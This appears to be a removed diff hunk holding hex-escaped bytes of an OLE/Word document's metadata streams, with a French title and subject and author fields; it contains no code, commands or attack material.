-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x03\x00\x00\x00\x0e\x00\x00\x00\x5f\x00\x45\x00\x6d\x00\x61\x00"
-"\x69\x00\x6c\x00\x53\x00\x75\x00\x62\x00\x6a\x00\x65\x00\x63\x00"
-"\x74\x00\x00\x00\x04\x00\x00\x00\x0d\x00\x00\x00\x5f\x00\x41\x00"
-"\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x45\x00\x6d\x00\x61\x00"
-"\x69\x00\x6c\x00\x00\x00\x00\x00\x05\x00\x00\x00\x18\x00\x00\x00"
-"\x5f\x00\x41\x00\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x45\x00"
-"\x6d\x00\x61\x00\x69\x00\x6c\x00\x44\x00\x69\x00\x73\x00\x70\x00"
-"\x6c\x00\x61\x00\x79\x00\x4e\x00\x61\x00\x6d\x00\x65\x00\x00\x00"
-"\x02\x00\x00\x00\xb0\x04\x00\x00\x13\x00\x00\x00\x0c\x04\x00\x00"
-"\x03\x00\x00\x00\x0c\xcb\xf4\x5d\x1f\x00\x00\x00\x2f\x00\x00\x00"
-"\x6d\x00\x69\x00\x73\x00\x65\x00\x20\x00\x20\x00\x6a\x00\x6f\x00"
-"\x75\x00\x72\x00\x20\x00\x72\x00\xe9\x00\x67\x00\x6c\x00\x65\x00"
-"\x6d\x00\x65\x00\x6e\x00\x74\x00\x73\x00\x20\x00\x2b\x00\x20\x00"
-"\x66\x00\x65\x00\x75\x00\x69\x00\x6c\x00\x6c\x00\x65\x00\x20\x00"
-"\x65\x00\x6e\x00\x67\x00\x61\x00\x67\x00\x65\x00\x6d\x00\x65\x00"
-"\x6e\x00\x74\x00\x20\x00\x45\x00\x4e\x00\x43\x00\x00\x00\x00\x00"
-"\x1f\x00\x00\x00\x1a\x00\x00\x00\x70\x00\x69\x00\x63\x00\x61\x00"
-"\x72\x00\x64\x00\x65\x00\x6e\x00\x40\x00\x63\x00\x6c\x00\x75\x00"
-"\x62\x00\x2d\x00\x69\x00\x6e\x00\x74\x00\x65\x00\x72\x00\x6e\x00"
-"\x65\x00\x74\x00\x2e\x00\x66\x00\x72\x00\x00\x00\x1f\x00\x00\x00"
-"\x10\x00\x00\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00"
-"\x69\x00\x61\x00\x20\x00\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00"
-"\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
-"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
-"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x28\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x02\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x00"
-"\x05\x00\x44\x00\x6f\x00\x63\x00\x75\x00\x6d\x00\x65\x00\x6e\x00"
-"\x74\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
-"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
-"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x38\x00\x02\x01\x04\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x09\x00\x00\x00\x24\x03\x00\x00\x00\x00\x00\x00"
-"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x01\x00\x00\x00\x03\x00\x00\x00\xd3\x11\x00\x00\x03\x00\x00\x00"
-"\x0c\x62\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00"
-"\x09\x00\x00\x00\x50\x61\x74\x72\x69\x63\x69\x61\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xfe\xff\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\xd5\xcd\xd5"
-"\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae\x44\x00\x00\x00"
-"\x05\xd5\xcd\xd5\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae"
-"\x4c\x01\x00\x00\x08\x01\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00"
-"\x68\x00\x00\x00\x0f\x00\x00\x00\x70\x00\x00\x00\x05\x00\x00\x00"
-"\x80\x00\x00\x00\x06\x00\x00\x00\x88\x00\x00\x00\x11\x00\x00\x00"
-"\x90\x00\x00\x00\x17\x00\x00\x00\x98\x00\x00\x00\x0b\x00\x00\x00"
-"\xa0\x00\x00\x00\x10\x00\x00\x00\xa8\x00\x00\x00\x13\x00\x00\x00"
-"\xb0\x00\x00\x00\x16\x00\x00\x00\xb8\x00\x00\x00\x0d\x00\x00\x00"
-"\xc0\x00\x00\x00\x0c\x00\x00\x00\xe9\x00\x00\x00\x02\x00\x00\x00"
-"\xe4\x04\x00\x00\x1e\x00\x00\x00\x05\x00\x00\x00\x2a\x2a\x2a\x2a"
-"\x00\x00\x45\x00\x03\x00\x00\x00\xd1\x00\x00\x00\x03\x00\x00\x00"
-"\x3b\x00\x00\x00\x03\x00\x00\x00\xa4\x73\x00\x00\x03\x00\x00\x00"
-"\x41\x0a\x0a\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00"
-"\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00"
-"\x00\x00\x00\x00\x1e\x10\x00\x00\x01\x00\x00\x00\x1d\x00\x00\x00"
-"\x4c\x45\x20\x4c\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f"
-"\x50\x52\x49\x45\x54\x41\x49\x52\x45\x20\x44\x45\x00\x0c\x10\x00"
-"\x00\x02\x00\x00\x00\x1e\x00\x00\x00\x06\x00\x00\x00\x54\x69\x74"
-"\x72\x65\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xd8\x01\x00\x00"
-"\x07\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x01\x00\x00\x00"
-"\xf4\x00\x00\x00\x00\x00\x00\x80\xfc\x00\x00\x00\x02\x00\x00\x00"
-"\x04\x01\x00\x00\x03\x00\x00\x00\x0c\x01\x00\x00\x04\x00\x00\x00"
-"\x74\x01\x00\x00\x05\x00\x00\x00\xb0\x01\x00\x00\x04\x00\x00\x00"
-"\x02\x00\x00\x00\x14\x00\x00\x00\x5f\x00\x41\x00\x64\x00\x48\x00"
-"\x6f\x00\x63\x00\x52\x00\x65\x00\x76\x00\x69\x00\x65\x00\x77\x00"
-"\x43\x00\x79\x00\x63\x00\x6c\x00\x65\x00\x49\x00\x44\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xfe\xff\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\xd5\xcd\xd5"
-"\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae\x30\x00\x00\x00"
-"\x08\x01\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x68\x00\x00\x00"
-"\x0f\x00\x00\x00\x70\x00\x00\x00\x05\x00\x00\x00\x80\x00\x00\x00"
-"\x06\x00\x00\x00\x88\x00\x00\x00\x11\x00\x00\x00\x90\x00\x00\x00"
-"\x17\x00\x00\x00\x98\x00\x00\x00\x0b\x00\x00\x00\xa0\x00\x00\x00"
-"\x10\x00\x00\x00\xa8\x00\x00\x00\x13\x00\x00\x00\xb0\x00\x00\x00"
-"\x16\x00\x00\x00\xb8\x00\x00\x00\x0d\x00\x00\x00\xc0\x00\x00\x00"
-"\x0c\x00\x00\x00\xe9\x00\x00\x00\x02\x00\x00\x00\xe4\x04\x00\x00"
-"\x1e\x00\x00\x00\x05\x00\x00\x00\x2a\x2a\x2a\x2a\x00\x00\x45\x00"
-"\x03\x00\x00\x00\xd1\x00\x00\x00\x03\x00\x00\x00\x3b\x00\x00\x00"
-"\x03\x00\x00\x00\xa4\x73\x00\x00\x03\x00\x00\x00\x41\x0a\x0a\x00"
-"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00"
-"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00"
-"\x1e\x10\x00\x00\x01\x00\x00\x00\x1d\x00\x00\x00\x4c\x45\x20\x4c"
-"\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f\x50\x52\x49\x45"
-"\x54\x41\x49\x52\x45\x20\x44\x45\x00\x0c\x10\x00\x00\x02\x00\x00"
-"\x00\x1e\x00\x00\x00\x06\x00\x00\x00\x54\x69\x74\x72\x65\x00\x03"
-"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
